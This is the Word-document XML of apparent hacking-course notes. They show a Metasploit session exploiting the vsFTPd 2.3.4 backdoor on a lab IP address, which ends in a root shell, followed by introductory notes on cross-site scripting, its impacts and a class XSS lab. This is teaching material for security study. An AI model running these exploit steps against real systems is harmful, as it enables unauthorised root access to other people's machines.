    <w:p w14:paraId="69609061" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FD240" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   RHOST                   yes       The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835FE19" w14:textId="0D6AE4A8" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   RPORT  21               yes       The target port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A61AF58" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="356563C0" w14:textId="58D2B6E3" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB083AC" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B82138" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDF42F9" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   0   Automatic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79193E4B" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="5877BC8E" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="0489706D"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set RHOST 192.168.127.154</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AABB19" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00360BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RHOST =&gt; 192.168.127.154</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD87C15"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payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1D0ED8" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="44CF2672" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:lastRenderedPageBreak/>
        <w:t>Compatible Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02C32C" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>===================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37064E12" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="07EDCF46" w14:textId="1A32A114" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   Name               Disclosure Date </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t>Rank    Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493575E3" w14:textId="4677D117" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   ----</w:t>
      </w:r>
      <w:r>
        <w:t>-----</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t>---------------</w:t>
      </w:r>
      <w:r w:rsidR="00D50929">
        <w:t xml:space="preserve">------             </w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">    ----------</w:t>
      </w:r>
      <w:r w:rsidR="00D50929">
        <w:t>----</w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F86DEB" w14:textId="40D93ECB" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">/interact        normal  </w:t>
      </w:r>
      <w:r w:rsidR="00D50929">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00360BE5">
        <w:t>Unix Command, Interact with Established Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D8BCA" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="4A089FC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set payload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47E71FAA" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00D50929" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50929">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">payload =&gt;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08B68C56"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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E326EF8" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="4FD814FB"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2FA9C8D0" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="1F898F0F" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B41EE77" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B663807" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   RHOST  192.168.127.154  yes       The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA05F99" w14:textId="3CE3A85D" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   RPORT  21               yes       The target por</w:t>
      </w:r>
      <w:r w:rsidR="00D50929">
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8032BE" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="312A0239" w14:textId="04BED646" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A40FA3" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8AC45" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D50DBFC" w14:textId="282EF0C8" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve">   0   Automatic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62142890" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="3A650A3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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146652E" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5"/>
    <w:p w14:paraId="14A47732" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>[*] Banner: 220 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>vsFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t xml:space="preserve"> 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047D78B5" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>[*] USER: 331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C6C6D" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>[+] Backdoor service has been spawned, handling...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228860A" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[+] UID: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00360BE5">
        <w:t>=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AAEB73" w14:textId="77777777" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>[*] Found shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A0CC6" w14:textId="67E2B9F5" w:rsidR="00360BE5" w:rsidRPr="00360BE5" w:rsidRDefault="00360BE5" w:rsidP="00360BE5">
      <w:r w:rsidRPr="00360BE5">
        <w:t>[*] Command shell session 1 opened (192.168.127.159:57936 -&gt; 192.168.127.154:6200) at 2014-06-03 22:42:36 +0300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F25594C" w14:textId="0004D655" w:rsidR="00360BE5" w:rsidRPr="00D50929" w:rsidRDefault="00D50929" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50929">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D50929">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00360BE5" w:rsidRPr="00D50929">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hoa</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50929">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CFEE00F" w14:textId="549F24B0" w:rsidR="00D50929" w:rsidRPr="00D50929" w:rsidRDefault="00D50929" w:rsidP="00360BE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50929">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255718FF" w14:textId="12944309" w:rsidR="003F2732" w:rsidRDefault="003F2732" w:rsidP="00B4531B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0103D309" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-site Scripting Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC3A18B" w14:textId="7145E129" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``````````````````````````````````````</w:t>
      </w:r>
      <w:r w:rsidR="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA01CA" w14:textId="0556E02C" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">- Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62DFF5" w14:textId="56671EA9" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- This vulnerability makes it possible for attackers to inject malicious code (e.g. JavaScript programs, HTML code, etc) into victim's web browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65411D98" w14:textId="0435D736" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- Using this malicious code, attackers can steal a victim’s credentials, such as session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E194423" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;&gt;&lt;/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A57A61D" w14:textId="73320BC8" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>++++++++++</w:t>
      </w:r>
      <w:r>
        <w:t>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA0CC88" w14:textId="01C5D8A0" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>=&gt;  Injection attack: XSS an attack resulting from an input validation failure that permits code to be input ... this unexpected code is then executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D35239" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>=&gt; Cookies: information stored in a browser and sent to a server with each resource request. A typical use is sending authentication credentials to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C86EE4D" w14:textId="1C496640" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>++++++++++</w:t>
      </w:r>
      <w:r>
        <w:t>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70CBCC" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003F2732">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55474A6B" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFEC7B5" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B40469F" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1E966" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C3CB43" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="4659C80B" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>Why is XSS Possible?:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5C2DC0" w14:textId="0446765D" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>`````````````````````</w:t>
      </w:r>
      <w:r>
        <w:t>````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD7F56" w14:textId="1E377174" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:lastRenderedPageBreak/>
        <w:t>- Absence of escape characters where they should be and turn code into plain text, for example, in search requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C40CE72" w14:textId="5008344C" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- The absence of filtering of attributes and their values in allowed tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3CF3EF" w14:textId="3508DDF4" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>+++++++++++</w:t>
      </w:r>
      <w:r>
        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0666EFDE" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360CDB89" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>-------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264EDFFA" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&gt; Cookie Theft [Session Hijack]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF33F0E" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&gt; Keylogging</w:t>
      </w:r>
      <w:r w:rsidRPr="003F2732">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C6CFA2" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&gt; Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061841A3" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&gt; URL Redirection ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9ABE23" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>_____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D4033" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2214A531" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A606F6B" w14:textId="30379C1A" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rXSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>[ Reflected XSS ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380DF75" w14:textId="606C6FB4" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">+ Reflected cross-site scripting is also known as Non-persistent cross-scripting. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1FCB88" w14:textId="3B063990" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">+ It is a cross-scripting attack where target servers reflect a malicious script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74763178" w14:textId="78DB15BC" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>+ The attacker can include the payload into an error page, a search result, or the target server’s response to some request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554B8D5" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="4E43C77A" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rXSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542AA2C6" w14:textId="75AFB87F" w:rsidR="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>````````````</w:t>
      </w:r>
      <w:r w:rsidR="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E229F3" w14:textId="02B37248" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>https://xss1.lab.hackintheclass.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00607CBD" w14:textId="154A5A8C" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>https://xss2.lab.hackintheclass.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E13CA" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="1B69D78C" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- a search form field that allows users to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467EC951" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- enters the following search string to test out the issue search feature: xxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE01F8" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- The search may returns no results that match the input string.</w:t>
      </w:r>
    </w:p>
